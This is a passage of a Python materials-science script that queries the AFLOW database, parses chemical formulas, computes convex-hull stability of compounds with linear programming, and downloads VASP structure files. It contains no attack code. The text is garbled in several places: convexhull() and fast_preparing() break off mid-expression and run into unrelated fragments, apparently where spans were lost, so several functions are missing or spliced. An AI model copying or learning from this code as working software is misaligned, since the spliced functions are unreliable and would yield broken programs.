\"Ge_d\" ,\n\"As\" : \"As\" ,\n\"Se\" : \"Se\" ,\n\"Br\" : \"Br\" ,\n\"Kr\" : \"Kr\" ,\n\"Rb\" : \"Rb_sv\" ,\n\"Sr\" : \"Sr_sv\" ,\n\"Y\" : \"Y_sv\" ,\n\"Zr\" : \"Zr_sv\" ,\n\"Nb\" : \"Nb_sv\" ,\n\"Mo\" : \"Mo_pv\" ,\n\"Tc\" : \"Tc_pv\" ,\n\"Ru\" : \"Ru_pv\" ,\n\"Rh\" : \"Rh_pv\" ,\n\"Pd\" : \"Pd\" ,\n\"Ag\" : \"Ag\" ,\n\"Cd\" : \"Cd\" ,\n\"In\" : \"In_d\" ,\n\"Sn\" : \"Sn_d\" ,\n\"Sb\" : \"Sb\" ,\n\"Te\" : \"Te\" ,\n\"I\" : \"I\" ,\n\"Xe\" : \"Xe\" ,\n\"Cs\" : \"Cs_sv\" ,\n\"Ba\" : \"Ba_sv\" ,\n\"La\" : \"La\" ,\n\"Ce\" : \"Ce\" ,\n\"Pr\" : \"Pr_3\" ,\n\"Nd\" : \"Nd_3\" ,\n\"Pm\" : \"Pm_3\" ,\n\"Sm\" : \"Sm_3\" ,\n\"Eu\" : \"Eu_2\" ,\n\"Gd\" : \"Gd_3\" ,\n\"Tb\" : \"Tb_3\" ,\n\"Dy\" : \"Dy_3\" ,\n\"Ho\" : \"Ho_3\" ,\n\"Er\" : \"Er_3\" ,\n\"Tm\" : \"Tm_3\" ,\n\"Yb\" : \"Yb_2\" ,\n\"Lu\" : \"Lu_3\" ,\n\"Hf\" : \"Hf_pv\" ,\n\"Ta\" : \"Ta_pv\" ,\n\"W\" : \"W_pv\" ,\n\"Re\" : \"Re\" ,\n\"Os\" : \"Os\" ,\n\"Ir\" : \"Ir\" ,\n\"Pt\" : \"Pt\" ,\n\"Au\" : \"Au\" ,\n\"Hg\" : \"Hg\" ,\n\"Tl\" : \"Tl_d\" ,\n\"Pb\" : \"Pb_d\" ,\n\"Bi\" : \"Bi_d\" ,\n\"Po\" : \"Po_d\" ,\n\"At\" : \"At_d\" ,\n\"Rn\" : \"Rn\" ,\n\"Fr\" : \"Fr_sv\" ,\n\"Ra\" : \"Ra_sv\" ,\n\"Ac\" : \"Ac\" ,\n\"Th\" : \"Th\" ,\n\"Pa\" : \"Pa\" ,\n\"U\" : \"U\" ,\n\"Np\" : \"Np\" ,\n\"Pu\" : \"Pu\" ,\n\"Am\" : \"Am\" ,\n\"Cm\" : \"Cm\" }\n\ndef aflowPotSet():\n aflowPot = {}\n for i,rec in enumerate(data):\n if not rec.get(\"code\").startswith(\"vasp\") : continue\n if rec.get(\"dft_type\")!=\"PAW_PBE\" : continue\n elp = rec.get(\"species_pp\").split(\",\")\n\n for pot in elp:\n if pot in aflowPot.keys():\n aflowPot[pot] += 1\n else:\n aflowPot[pot] = 1\n for key in vaspPot:\n kk = -1\n for k1 in aflowPot:\n el = k1.split('_')[0]\n if el==key:\n if aflowPot[k1]>kk:\n pot = k1\n kk = aflowPot[k1]\n if kk > 0: vaspPot[key] = pot\n\ndef signal_handler(sig, frame):\n print('You pressed Ctrl+C!')\n sys.exit(0)\n\ndef aflow_missing(entry):\n if os.path.exists(\"aflow_missing.json\") :\n with open(\"aflow_missing.json\", encoding='utf-8') as json_file:\n missing_data = json.load(json_file)\n missing_data.append(str(entry))\n else:\n missing_data = [str(entry)]\n with open('aflow_missing.json', 'w') as outfile:\n json.dump(missing_data, outfile)\n sys.exit(0)\n\n\"\"\"convert decimal number q into fractional\"\"\"\ndef frac(q):\n a = Fraction(q).limit_denominator()\n if (a.denominator >1024):\n return('{:+.5f}*'.format(q))\n else:\n return('{:+.0f}/{:.0f}*'.format(a.numerator, a.denominator))\n\n\"\"\"check if value is a float number\"\"\"\ndef isfloat(value):\n try:\n float(value)\n return True\n except ValueError:\n return False\n\n\"\"\"add 1.0 as summation constrain for the list of number in line\nline - a list of composition\nreturn:\na list lead lead by 1.0 followed by a list of composition\n\"\"\"\ndef bMaker(line):\n b = [1.0]\n b.extend(line)\n b = np.array(list(map(float,b)))\n return (b)\n\n\"\"\"combine phase fraction with phase names\nX - phase composition\nPhases - list of phase name\nreturn:\na string with composition followed by phase name (multiple)\n\"\"\"\ndef getPhase(X,Phases):\n decompose = \" \"\n for x in X:\n if (x[1] == 1.0):\n decompose = Phases[x[0]]\n break\n else:\n decompose = decompose + frac(x[1])+Phases[x[0]]\n return(decompose.replace(\" +\",\"\"))\n\n\n\"\"\"convert a chemical formula into element list and composition\nformula - chemical formula\nreturn:\nelement list and composition list\n\"\"\"\ndef formula2composition(formula):\n formula = formula.replace(\" \",'').replace(\"-\",'').replace(\",\",'')\n newc = 
\"\"\n \"\"\"Follow the convention, elemental symbol must start from capital letter\"\"\"\n for c in formula:\n if c in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\":\n newc = newc + '|'\n newc = newc + c\n els = newc.split('|')\n els = [k for k in els if k != '']\n\n \"\"\"now get the composition for each element\"\"\"\n ele = []\n com = []\n for el in els:\n newel = \"\"\n newcc = \"\"\n for c in el:\n if c.isalpha():\n newel = newel + c\n else:\n newcc = newcc + c\n\n if (newel not in periodictable):\n print('\"',newel,'\" is not an element! your formula is wrong!')\n sys.exit(1)\n ele.append(newel)\n\n if (len(newcc)!=0):\n if (isfloat(newcc)):\n com.append(float(newcc))\n else:\n print('\"',newcc,'\" is not a float number! your formula is wrong!')\n sys.exit(1)\n else:\n com.append(1.0)\n com = np.array(list(map(float,com)))\n com = com/sum(com)\n\n #sorted the sequence and merge the duplicate\n elist = sorted(set(ele))\n clist = np.zeros(len(elist), dtype=float)\n for j,el in enumerate(ele):\n ix = elist.index(el)\n clist[ix] += com[j]\n\n return elist,clist\n\n\"\"\"convert a chemical formula into element list and composition\nformula - chemical formula\nreturn:\nelement list and composition list\n\"\"\"\ndef formula2nat(formula):\n formula = formula.replace(\" \",'').replace(\"-\",'').replace(\",\",'')\n newc = \"\"\n \"\"\"Follow the convention, elemental symbol must start from capital letter\"\"\"\n for c in formula:\n if c in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\":\n newc = newc + '|'\n newc = newc + c\n els = newc.split('|')\n els = [k for k in els if k != '']\n\n \"\"\"now get the composition for each element\"\"\"\n ele = []\n com = []\n for el in els:\n newel = \"\"\n newcc = \"\"\n for c in el:\n if c.isalpha():\n newel = newel + c\n else:\n newcc = newcc + c\n\n if (newel not in periodictable):\n print('\"',newel,'\" is not an element! your formula is wrong!')\n sys.exit(1)\n ele.append(newel)\n\n if (len(newcc)!=0):\n if (isfloat(newcc)):\n com.append(int(newcc))\n else:\n print('\"',newcc,'\" is not a float number! your formula is wrong!')\n sys.exit(1)\n else:\n com.append(1)\n com = np.array(list(map(int,com)))\n\n #sorted the sequence and merge the duplicate\n elist = sorted(set(ele))\n clist = np.zeros(len(elist), dtype=int)\n for j,el in enumerate(ele):\n ix = elist.index(el)\n clist[ix] += com[j]\n\n return elist,clist\n\ndef prety_formula(_els,_nat):\n els = sorted(set(_els))\n nat = np.zeros(len(els),dtype=int)\n for i,el in enumerate(_els):\n ix = els.index(el)\n nat[ix] += _nat[i]\n\n Nd = min(nat)\n for i in range(Nd,0,-1):\n out = True\n for j in range(len(nat)):\n if ((nat[j]//i)*i!=nat[j]):\n out = False\n break\n if out:\n break\n form = \"\"\n for j,el in enumerate(els):\n ix = nat[j]//i\n form = form+el\n if ix!=1:\n form = form+str(ix)\n return form\n\ndef downloads(filters):\n #http://aflowlib.duke.edu/search/API/?species((Hf,Pt),Rh),$nspecies(3),energy_atom,$paging(0)\n #{\"compound\":\"Hf1Pt1Rh2\",\"auid\":\"aflow:bb46bd634476e7fb\",\"aurl\":\"aflowlib.duke.edu:AFLOWDATA/LIB3_RAW/Hf_pvPtRh_pv/TBCC015.CAB\",\"species\":\"Hf,Pt,Rh\"}\n # ).orderby(K.energy_atom)\n sys.stdout.write('\\nScreening {} ... 
'.format(filters))\n result = search(batch_size=9999\n ).filter(filters\n ).filter((K.code % 'vasp')\n ).select(K.energy_atom, K.species, K.composition, K.compound, K.code, K.dft_type, K.volume_atom, K.Pearson_symbol_relax, K.prototype, K.sg2, K.spacegroup_relax, K.species_pp)\n return processresult(result)\n\ndef processresult(result):\n global allrec, nentries, totaltime, startime, missing_data\n allcompds = {}\n try:\n sys.stdout.write('{}+{} entries returned.\\n'.format(nentries,len(result)))\n nentries += len(result)\n except:\n sys.stdout.write('{}+{} entries returned.\\n'.format(nentries,0))\n return allcompds\n\n for entry in result:\n if str(entry) in missing_data: \n print(str(entry), \"not FOUND!\")\n continue\n try:\n if not all(elem in runPot for elem in entry.species_pp) : continue\n composition = entry.composition\n compound = prety_formula(entry.species,composition)\n if compound in allcompds.keys():\n energy_atom = entry.energy_atom\n if float(energy_atom) >= float(allcompds.get(compound)[0]) : continue\n \"\"\"\n ret = requests.head(str(entry))\n if ret.status_code >= 400 : continue #error in AFLOW, link not exist\n \"\"\"\n\n _dft_type = entry.dft_type[0].strip()\n if _dft_type!=dft_type : continue\n # prec = [entry.compound,entry.code,entry.dft_type,entry.enthalpy_formation_atom,entry.natoms,entry.nspecies,entry.Pearson_symbol_orig,entry.prototype,entry.sg,entry.spacegroup_orig,entry.species,entry.species_pp,entry.stoichiometry,entry.energy_atom,entry.volume_atom]\n arec = [entry.energy_atom, entry, entry.species, composition, entry.compound, entry.code, _dft_type, entry.volume_atom, entry.Pearson_symbol_relax, entry.prototype, entry.sg2, entry.spacegroup_relax, entry.auid]\n prec = {compound:arec}\n #print(prec)\n allcompds.update(prec)\n except:\n traceback.print_exc()\n pass\n sys.stdout.write ('{} + {} Secs. 
'.format(round(totaltime,3), round(time.time()-startime -totaltime,3)))\n totaltime = time.time()-startime\n if len(allcompds) != 0:\n sys.stdout.write('{}+{} compounds accumulated\\n'.format(len(allrec),len(allcompds)))\n return allcompds\n \n\ndef outelement(els):\n if containoperator==\"$all\":\n if all(elem in els for elem in contain) : return True\n else : return False\n elif containoperator==\"$in\":\n for el in els:\n if el in contain: return True\n return False\n else:\n return True\n\n\n\"\"\"make the convex hull and find the stability of all phases\ndstack - data stack contain all information, such as phasename, energy, elements, etc\nreturn:\n\"\"\"\ndef convexhull(_dstack,fastcode=False):\n Elements = []\n Phases = []\n Gstack = []\n dstack = []\n for ff in _dstack:\n els = ff[\"elements\"].split(' ')\n els = [k for k in els if k != '']\n els = sorted(sorted(set(els)))\n for el in els:\n if el not in Elements:\n Elements.append(el)\n if len(els)==1:\n if els[0] in suspend:\n continue\n dstack.append(ff)\n Phases.append(ff[\"phasename\"])\n Gstack.append(ff[\"energy\"])\n\n Elements = sorted(set(Elements))\n print('\\n\\n#Elemental components:', Elements)\n\n amatrix = []\n Amatrix = []\n refG = np.zeros(len(Elements), dtype=float)\n\n \"\"\"Make the A matrix for simplex algebra\"\"\"\n for ff in dstack:\n tComponents = ff[\"elements\"].split(' ')\n tComponents = [k for k in tComponents if k != '']\n tnComponents = np.array(list(map(float,ff[\"composition\"])))\n Components = sorted(set(tComponents))\n nComponents = np.zeros(len(Components))\n for i0,el in enumerate(tComponents):\n ix = Components.index(el)\n nComponents[ix] = nComponents[ix] + tnComponents[i0]\n nComponents /= nComponents.sum()\n\n aaa = []\n Amatrix.append(1.0)\n for i,element in enumerate(Elements):\n if element in Components:\n j = Components.index(element)\n aaa.append(nComponents[j])\n Amatrix.append(nComponents[j])\n else:\n aaa.append(0.0)\n Amatrix.append(0.0)\n\n amatrix.append(aaa)\n for m,el in enumerate(Elements):\n if (float(aaa[m]) == 1.0):\n refG[m] = min(refG[m], float(ff[\"energy\"]))\n\n row= len(Phases)\n col= len(Elements)\n \n Gstack = np.array(list(map(float,Gstack)))\n Amatrix = np.array(list(map(float,Amatrix))).reshape(row,col+1)\n Amatrix=Amatrix.T\n\n if fastcode:\n fastGstack, fastPhases, fastAmatrix = fast_preparing(amatrix, Elements, Gstack, Phases, Amatrix)\n\n ndata = 0\n hstack = []\n for j,line in enumerate(amatrix):\n \"\"\"using simplex to find if is a stable phase\"\"\" \n comp = np.array(list(map(float,line)))\n if fastcode:\n \"\"\"optimizing code by remove redunt conditions\"\"\"\n res = fast_linprog(fastGstack, fastAmatrix, comp)\n x = [[i,q] for i,q in enumerate(res.x) if (q>1.e-8)]\n hull = getPhase(x,fastPhases)\n else:\n \"\"\"use normal minimization\"\"\"\n b = bMaker(comp)\n res = linprog(Gstack, Amatrix, b, bounds=(0.0, 1.0),method='Simplex')\n x = [[i,q] for i,q in enumerate(res.x) if (q>1.e-8)]\n hull = getPhase(x,Phases)\n\n \"\"\"deltaF is the formation energy\"\"\"\n deltaF = (float(Gstack[j]) - sum(comp*refG))\n dstack[j][\"formation_energy\"] = deltaF\n #print(sum(res.x*res.x))\n #print(dstack[j])\n #if (abs(sum(res.x*res.x)-1.0) < 1.e-3) and abs(res.fun-Gstack[j])=\")\n if line[0].endswith(\"Pearson_symbol_relax\") : Pearson_symbol = line[1]\n elif line[0].endswith(\"prototype\") : prototype = line[1]\n elif line[0].endswith(\"sg2\") : sg2 = line[1].split(\" \")[0]\n elif line[0].endswith(\"spacegroup_relax\") : spacegroup = int(line[1])\n elif 
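# A toy-sized sketch of the linear program at the heart of convexhull() above:
# pick phase fractions x >= 0 that minimize total energy while reproducing the
# target composition; a phase is stable when the optimum selects it. Numbers
# are invented. This sketch uses the equality form and SciPy's 'highs' solver,
# whereas the script above passes its matrices positionally to the legacy
# 'Simplex' method.
import numpy as np
from scipy.optimize import linprog

G = np.array([0.0, 0.0, -0.5])        # energy/atom: pure A, pure B, compound AB
A_eq = np.array([[1.0, 1.0, 1.0],     # fractions sum to one
                 [1.0, 0.0, 0.5],     # element-A balance
                 [0.0, 1.0, 0.5]])    # element-B balance
b_eq = np.array([1.0, 0.5, 0.5])      # target: 50/50 A-B composition
res = linprog(G, A_eq=A_eq, b_eq=b_eq, bounds=(0.0, 1.0), method='highs')
print(res.x)   # -> [0. 0. 1.]: AB alone is the lowest-energy decomposition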
line[0].endswith(\"energy_cutoff\") : energy_cutoff = line[1]\n elif line[0].endswith(\"species_pp\") : species_pp = line[1]\n spname = ff[\"phasename\"]+'+'+sg2.replace('{','').replace('}','').replace('/','').replace('_','')+'+'+prototype+'+'+str(spacegroup)+'+'+ff[\"afid\"]\n \n for ii,bline in enumerate(records) :\n aline = bline.decode(\"utf-8\").strip()\n line = aline.split(\"
=\")\n \n if len(kpoints)!=0 and not kpo:\n for kpoint in kpoints:\n try:\n aline.index(kpoint+'')\n kpo = True\n except:\n pass\n if kpo:\n urllib.request.urlretrieve(entry+'/'+kpoint, posdir + spname + \".KPOINTS\")\n break\n\n if len(contcars)!=0 and not con:\n for contcar in contcars:\n try:\n aline.index(contcar+'')\n con = True\n except:\n pass\n if con:\n poscarfile = posdir + spname + \".VASP\"\n urllib.request.urlretrieve(entry+'/'+contcar, poscarfile)\n alines = open(poscarfile, 'r').readlines()\n alines.insert(5,\" \"+ff[\"elements\"]+'\\n')\n N = 8+sum(ff[\"composition\"])\n open(poscarfile, 'w').writelines(alines[:N])\n kustoutfiles(poscarfile)\n break\n\n open(posdir + spname + \".POTCAR\", 'w').write(str(species_pp)+'\\n')\n open(posdir + spname + \".ENCUT\", 'w').write(str(energy_cutoff)+'\\n')\n if ff[\"hull_energy\"]<=ehullthr:\n sys.stdout.write(\"{:<16s} {:<16s} {:3d} {:12s} {:7s} {:<22s}\".format(ff[\"phasename\"], ff[\"pretty_formula\"], spacegroup, sg2, Pearson_symbol, prototype))\n else:\n sys.stdout.write(\"{:>16s} {:>16s} {:3d} {:12s} {:7s} {:<22s}\".format(ff[\"phasename\"], ff[\"pretty_formula\"], spacegroup, sg2, Pearson_symbol, prototype))\n return poscarfile\n \n\n\"\"\"attempt to speed up the speed. I am not sure if I will continue on it\"\"\"\ndef fast_preparing(amatrix, Elements, Gstack, Phases, Amatrix):\n comPhases = [getPhCom(Elements,l) for l in amatrix]\n g = []\n ccg = []\n nx = []\n for j,gg in enumerate(Gstack):\n cc = comPhases[j]\n if cc in ccg:\n ix = ccg.index(cc)\n if gg1.e-8)]\n\n prettycom = \"\"\n print(\"\\nBy atomic percentages, the phases are:\\n\")\n for x in X:\n #phases = Phases[x[0]].split(\"#\")\n phases = Phases[x[0]]\n print('{:6.2f} {:12s}'.format(x[1]*100, phases))\n if prettycom == \"\":\n prettycom = '{:6.2f}*{}'.format(x[1]*100, phases)\n else:\n prettycom += ' +' + '{:6.2f}*{}'.format(x[1]*100, phases)\n \n print(\"\\n\", formula, \" is made of \", prettycom, \"\\n\")\n\ndef setoutdir(pdir):\n if pdir==\"\":\n pdir = \"MP\"\n i = 0\n posdir = pdir + str(i)\n #print ( os.path.isdir(posdir), os.path.isfile(posdir), os.path.exists(posdir) )\n while ( os.path.exists(posdir) ):\n i += 1\n posdir = pdir + str(i)\n os.mkdir(posdir)\n elif (os.path.isdir(pdir)):\n posdir = pdir\n elif os.path.isfile(pdir):\n print(\"file with the same name exist! please give another name!\")\n sys.exit(1)\n elif not os.path.exists(pdir):\n posdir = pdir\n os.mkdir(posdir)\n return posdir+\"/\"\n\n\n\"\"\"output POSCAR, INCAR, KPOINTS and stability of each download structure\nposdir - dir for files to be outputted into\ndstack - data stack contain all information, such as phasename, energy, elements, etc\ncalhull - bool to instruct if calculatiing convex hull\nehull - how high above the hull the structures will be included in the output\nreturn:\n\"\"\"\ndef outMPdata(posdir, _dstack, calhull, ehull):\n KPOINTS = ['KPOINTS.relax2', 'KPOINTS.relax1', 'KPOINTS.relax', 'KPOINTS.static']\n CONTCARS = ['CONTCAR.relax2', 'CONTCAR.relax1', 'CONTCAR.relax', 'CONTCAR.relax.vasp', 'POSCAR.bands', 'POSCAR.orig']\n print (\"Compound Formula SG Symmetry Pearson Prototype Tenergy(eV/atom) Fenergy : Primitive POSCAR\")\n dstack = []\n for ff in _dstack:\n if ff[\"hull_energy\"] < 1.e-6:\n dstack.append(ff)\n for ff in _dstack:\n if not ff[\"hull_energy\"] < 1.e-6:\n dstack.append(ff)\n\n for ff in dstack:\n if not outelement(ff[\"elements\"]) : continue\n pname = ff[\"phasename\"]\n energy = ff[\"energy\"]\n entry = ff[\"entry\"]\n\n #sys.stdout.write ('{} Secs. 
'.format(round(time.time()-startime,3)))\n if (not calhull):\n sys.stdout.write(\"{} {} {} {} {:.6f}\\n\".format(ff[\"pretty_formula\"], ff[\"elements\"], ff[\"composition\"], pname, energy))\n else:\n eh = ff[\"hull_energy\"]\n ef = ff[\"formation_energy\"]\n if eh < ehull:\n if eh < ehullthr:\n if preload:\n try:\n poscarfile = webget(ff[\"entry\"],CONTCARS,KPOINTS,ff)\n sys.stdout.write(\" {:11.6f} {:10.6f} : \".format(energy,ef))\n except:\n traceback.print_exc()\n sys.stdout.write(\"{:<16s} {:11.6f} {:10.6f} : \".format(pname, energy, ef))\n if eh > 0.0000005: sys.stdout.write(\"{:.6f} above hull {}, \".format(eh,ff[\"hull\"]))\n sys.stdout.write(\"{}\\n\".format(poscarfile))\n continue\n else:\n sys.stdout.write(\"{:<16s} {:3d} {:12s} {:7s} {:<22s} {:11.6f} {:10.6f} : \".format(pname, ff[\"spacegroup\"], ff[\"sg2\"].split(' ')[0], ff[\"Pearson_symbol\"], ff[\"prototype\"],energy, ef))\n if eh > 0.0000005: sys.stdout.write(\"{:.6f} above hull {}, \".format(eh,ff[\"hull\"]))\n else:\n poscarfile = \"\"\n if preload:\n try:\n poscarfile = webget(ff[\"entry\"],CONTCARS,KPOINTS,ff)\n sys.stdout.write(\" {:11.6f} {:10.6f} {:.6f} above hull : \".format(energy,ef,eh))\n except:\n sys.stdout.write(\"{:<16s} {:11.6f} {:10.6f} {:.6f} above hull : \".format(pname, energy, ef, eh))\n if eh > 0.0000005: sys.stdout.write(\"{:.6f} above hull {}, \".format(eh,ff[\"hull\"]))\n sys.stdout.write(\"{}\\n\".format(poscarfile))\n continue\n else:\n sys.stdout.write(\"{:<16s} {:3d} {:12s} {:7s} {:<22s} {:11.6f} {:10.6f} {:.6f} above hull : \".format(pname, ff[\"spacegroup\"], ff[\"sg2\"].split(' ')[0], ff[\"Pearson_symbol\"], ff[\"prototype\"],energy, ef, eh))\n if eh > 0.0000005: sys.stdout.write(\"{:.6f} above hull {}, \".format(eh,ff[\"hull\"]))\n else:\n continue\n\n spname = ff[\"phasename\"]+'+'+ff[\"sg2\"].split(' ')[0].replace('{','').replace('}','').replace('/','').replace('_','')+'+'+ff[\"prototype\"]+'+'+str(ff[\"spacegroup\"])+'+'+ff[\"afid\"]\n for cc in KPOINTS:\n try:\n entry.files[cc](posdir + spname + \".KPOINTS\")\n except:\n \"\"\" cannot find CONTCAR cc from entry, goto web download \"\"\"\n kpoints = str(entry)+'/'+cc\n ret = requests.head(kpoints)\n if ret.status_code >= 400 : continue\n urllib.request.urlretrieve(kpoints, posdir + spname + \".KPOINTS\")\n break\n\n found = False\n for cc in CONTCARS:\n try:\n lines = entry.files[cc]()\n lines = lines.split('\\n')\n lines = [k for k in lines if k != '']\n except:\n \"\"\" cannot find CONTCAR cc from entry, goto web download \"\"\"\n contcar = str(entry)+'/'+cc\n ret = requests.head(contcar)\n if ret.status_code >= 400 : continue\n req = urllib.request.Request(contcar)\n blines = urlopen(req).readlines()\n lines = []\n for bb,bline in enumerate(blines):\n lines.append(bline.decode(\"utf-8\").strip())\n\n with open(posdir + spname + \".VASP\", 'w') as f0:\n for l in range(0,5):\n f0.write(\"{}\\n\".format(lines[l]))\n f0.write(\" {}\\n\".format(ff[\"elements\"]))\n natom = sum(ff[\"composition\"])\n for l in range(5,7+natom):\n f0.write(\"{}\\n\".format(lines[l]))\n print(posdir + spname + \".VASP\")\n found = True\n kustoutfiles(posdir + spname + \".VASP\")\n break\n\n if not found :\n print(\"WARNING! 
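# A hedged sketch of the download guard used around urlretrieve() in webget()
# and outMPdata() above: probe with a HEAD request first and skip 4xx/5xx
# responses so a missing AFLOW file does not abort the run. The URL and
# destination below are placeholders.
import urllib.request
import requests

def fetch_if_exists(url, dest):
    if requests.head(url).status_code >= 400:
        return False              # dead link on the server side
    urllib.request.urlretrieve(url, dest)
    return True

# fetch_if_exists('http://example.org/CONTCAR.relax2', 'CONTCAR.relax2')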
CONTCAR not FOUND\", str(entry))\n #aflow_missing(entry)\n\n \"\"\"\n with open(pname+\".POTCAR\",'w') as f0:\n f0.write(\"{}\\n\".format(ff[\"POTCAR\"]))\n\n with open(pname+\".INCAR\",'w') as f0:\n incar = ff[\"INCAR\"]\n for key, value in incar.items() :\n f0.write(\"{}= \".format(key))\n if type(value) is list:\n for v in value:\n f0.write(\"{} \".format(v))\n elif type(value) is bool:\n f0.write(\".{}.\".format(value))\n else:\n f0.write(\"{}\".format(value))\n f0.write(\"\\n\")\n \"\"\"\n print()\n\n\"\"\"combine elemental symbol and phase composition into a string\nElements -\ncompistion -\nreturn:\n\"\"\"\ndef getPhCom(Elements,composition):\n decompose = \" \"\n for e,c in enumerate(composition):\n if (c == 1.0):\n decompose = Elements[e]\n break\n else:\n decompose = decompose + frac(c)+Elements[e]\n return(decompose.replace(\" +\",\"\"))\n\nstartime = time.time()\ntotaltime = 0\n\n\"\"\"unit conversion\"\"\"\neVtoGPa = 160.21766208\neVtoJ = 96486.9\npreload = False\nwithin = ['Pt', 'Ni', 'Cr']\nwithin = ['Co', 'Yb', 'Mn', 'Sb']\nwithin = ['Pt', 'Ir', 'Rh', 'Ni', 'Zr', 'Hf', 'Si', 'Cr']\ncontain = []\n\"\"\"handle command line option\"\"\"\n\nfastcode = True #\"\"\" key to cotrol the search method\"\"\"\n#periodictable = [key for key,value in MM_of_Elements.items()] #\"\"\" list of all elements from the periodic table\"\"\"\nperiodictable = MM_of_Elements.keys() #\"\"\" list of all elements from the periodic table\"\"\"\nehullthr = 1.e-4\nehull = ehullthr\ncalhull = False #\"\"\" key to cotrol the if calculating the convex hull\"\"\"\nsuspend = []\n\ninput_within = False #\"\"\" key to cotrol the within input\"\"\"\ninput_wCom = False #\"\"\" key to cotrol the within input\"\"\"\ninput_contain = False #\"\"\" key to cotrol the contain input\"\"\"\nformula_within = \"\" #\"\"\"chemical formula\"\"\"\nformula_wCom = \"\" #\"\"\"chemical formula\"\"\"\nformula_contain = \"\" #\"\"\"chemical formula\"\"\"\ncontainoperator = \"$all\" #contain any elements within the list of contain\ndft_type = \"PAW_PBE\"\nquaternary = False\nallpot = False\nvasppot = False\naflowpot = True\ndeltaH = False\nallstr = False\nKUST0 = \"SSS/\"\n\ncount = 1\nwhile (count < len(sys.argv)):\n if (sys.argv[count] == \"-within\"):\n \"\"\"for code developing test\"\"\"\n within = ['Fe', 'Ni']\n within = ['Pt', 'Ir', 'Rh', 'Ni', 'Zr', 'Hf', 'Si', 'Cr']\n within = ['Fe', 'Ni', 'Al', 'C', 'Co', 'Cr', 'Cu', 'Hf', 'Mn', 'Mo', 'Nb', 'Re', 'Si', 'Ta', 'Ti', 'W']\n input_within = True\n input_contain = False\n input_wCom = False\n elif (sys.argv[count] == \"-preload\"):\n preload = not preload\n elif (sys.argv[count] == \"-kust\"):\n count = count + 1\n if (count >= len(sys.argv)):\n break\n KUST0 = sys.argv[count].replace('/','') + '/'\n elif (sys.argv[count] == \"-allstr\"):\n allstr = not allstr\n elif (sys.argv[count] == \"-allpot\"):\n allpot = not allpot\n elif (sys.argv[count] == \"-vasppot\"):\n vasppot = not vasppot\n elif (sys.argv[count] == \"-aflowpot\"):\n aflowpot = not aflowpot\n elif (sys.argv[count] == \"-deltaH\"):\n deltaH = not deltaH\n elif (sys.argv[count] == \"-wCom\"):\n input_wCom = True\n input_within = False\n input_contain = False\n elif (sys.argv[count] == \"-containall\"):\n containoperator = \"$all\"\n input_contain = True\n input_within = False\n input_wCom = False\n elif (sys.argv[count] == \"-containany\"):\n containoperator = \"$in\"\n input_contain = True\n input_within = False\n input_wCom = False\n elif (sys.argv[count] == \"-fastcode\"):\n fastcode = not fastcode\n elif 
(sys.argv[count] == \"-suspend\"):\n count = count + 1\n if (count >= len(sys.argv)):\n break\n suspend.append(sys.argv[count])\n elif (sys.argv[count] == \"-ehull\"):\n count = count + 1\n if (count >= len(sys.argv)):\n break\n ehull = float(sys.argv[count])\n elif (sys.argv[count] == \"-ehullthr\"):\n count = count + 1\n if (count >= len(sys.argv)):\n break\n ehullthr = float(sys.argv[count])\n elif (input_within):\n formula_within = formula_within+sys.argv[count]\n elif (input_wCom):\n formula_wCom = formula_wCom+sys.argv[count]\n elif (input_contain):\n formula_contain = formula_contain+sys.argv[count]\n else:\n print (\"************* UNKOWN option\",'\"',sys.argv[count],'\"')\n sys.exit(1)\n count = count + 1\n\nsignal.signal(signal.SIGINT, signal_handler)\ndef kustdirlist():\n if not os.path.exists(KUST0):\n os.mkdir(KUST0)\n list = os.listdir(KUST0)\n list = [i for i in list if i.endswith('.VASP')]\n return list\n\ndef kustoutfiles(spname):\n ff0 = spname.split('/')[1].split('+')\n ff0 = ff0[0]+'+'+ff0[1]\n for file in kustfiles:\n if file.startswith(ff0) : return\n\n ff0 = spname.split('/')[0]+'/'\n shutil.copy(spname, spname.replace(ff0,KUST0))\n\nkustfiles = kustdirlist()\n\nposdir = setoutdir(\"AF0\")\nif formula_within==\"\":\n for el in within:\n formula_within += el\nif formula_wCom!=\"\":\n within,compos_within = wCom2composition(formula_wCom)\nif formula_within!=\"\":\n within,compos_within = formula2composition(formula_within)\nif formula_contain!=\"\":\n contain,compos_contain = formula2composition(formula_contain)\n\nnentries = 0\nallrec = {}\n\nmissing_data = []\nif os.path.exists(\"aflow_missing.json\") :\n with open(\"aflow_missing.json\", encoding='utf-8') as json_file:\n missing_data = json.load(json_file)\n\nif aflowpot:\n \"\"\"\n with open(\"download_code.json\", encoding='utf-8') as json_file:\n code_data = json.load(json_file)\n with open(\"download_dft_type.json\", encoding='utf-8') as json_file:\n dft_data = json.load(json_file)\n with open(\"download_pp.json\", encoding='utf-8') as json_file:\n pp_data = json.load(json_file)\n with open(\"download_efa.json\", encoding='utf-8') as json_file:\n efa_data = json.load(json_file)\n for i,rec in enumerate(code_data):\n if rec.get(\"aurl\")!=dft_data[i].get(\"aurl\") :\n print (\"ERROR!\",rec.get(\"aurl\"),\"not equal to\", dft_data[i].get(\"aurl\"))\n sys.exit()\n code_data[i][\"dft_type\"] = dft_data[i].get(\"dft_type\")\n for i,rec in enumerate(pp_data):\n if rec.get(\"aurl\")!=dft_data[i].get(\"aurl\") :\n print (\"ERROR!\",rec.get(\"aurl\"),\"not equal to\", dft_data[i].get(\"aurl\"))\n sys.exit()\n code_data[i][\"species_pp\"] = rec.get(\"species_pp\")\n for i,rec in enumerate(efa_data):\n if rec.get(\"aurl\")!=dft_data[i].get(\"aurl\") :\n print (\"ERROR!\",rec.get(\"aurl\"),\"not equal to\", dft_data[i].get(\"aurl\"))\n sys.exit()\n code_data[i][\"enthalpy_formation_atom\"] = rec.get(\"enthalpy_formation_atom\")\n with open(\"download_spacegroup_relax.json\", encoding='utf-8') as json_file:\n efa_data = json.load(json_file)\n for i,rec in enumerate(efa_data):\n if rec.get(\"aurl\")!=dft_data[i].get(\"aurl\") :\n print (\"ERROR!\",rec.get(\"aurl\"),\"not equal to\", dft_data[i].get(\"aurl\"))\n sys.exit()\n code_data[i][\"spacegroup_relax\"] = rec.get(\"spacegroup_relax\")\n with open('aflow.json', 'w') as outfile:\n json.dump(code_data, outfile)\n sys.exit()\n \"\"\"\n\n with open(\"aflow.json\", encoding='utf-8') as json_file:\n data = json.load(json_file)\n if not vasppot: aflowPotSet()\n\nrunPot = 
